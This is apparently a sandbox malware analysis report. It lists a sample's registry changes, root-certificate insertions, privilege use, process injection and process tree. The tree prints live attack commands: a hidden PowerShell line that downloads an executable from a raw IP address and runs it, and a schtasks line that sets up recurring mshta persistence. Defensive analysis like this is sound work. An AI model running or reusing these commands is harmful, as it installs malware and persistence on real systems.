98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\djrq\nbiciq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2988 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\cmd.exe
PID 2988 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\cmd.exe
PID 2988 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\cmd.exe
PID 2988 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\cmd.exe
PID 2988 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\mshta.exe
PID 2988 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\mshta.exe
PID 2988 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\mshta.exe
PID 2988 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe C:\Windows\SysWOW64\mshta.exe
PID 3004 wrote to memory of 2068 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3004 wrote to memory of 2068 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3004 wrote to memory of 2068 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3004 wrote to memory of 2068 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2064 wrote to memory of 1864 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2064 wrote to memory of 1864 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2064 wrote to memory of 1864 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2064 wrote to memory of 1864 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1864 wrote to memory of 2780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
PID 1864 wrote to memory of 2780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
PID 1864 wrote to memory of 2780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
PID 1864 wrote to memory of 2780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
PID 2780 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2780 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2780 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2780 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1936 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 1936 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 1936 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 1936 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
PID 2936 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Windows\SysWOW64\WerFault.exe
PID 2936 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Windows\SysWOW64\WerFault.exe
PID 2936 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Windows\SysWOW64\WerFault.exe
PID 2936 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe C:\Windows\SysWOW64\WerFault.exe
PID 1936 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
PID 1936 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
PID 1936 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
PID 1936 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
PID 1936 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 1936 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 1936 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 1936 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
PID 2296 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe
PID 2296 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe
PID 2296 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe
PID 2296 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe
PID 2652 wrote to memory of 1864 N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe
PID 2652 wrote to memory of 1864 N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe
PID 2652 wrote to memory of 1864 N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe
PID 2652 wrote to memory of 1864 N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe
PID 2652 wrote to memory of 2676 N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe C:\Windows\SysWOW64\WerFault.exe
PID 2652 wrote to memory of 2676 N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe C:\Windows\SysWOW64\WerFault.exe
PID 2652 wrote to memory of 2676 N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe

"C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE

"C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 500

C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe

"C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe"

C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe

"C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe" -burn.filehandle.attached=216 -burn.filehandle.self=212

C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe

C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 208

C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe

"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"

C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 1200

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 1036

C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe

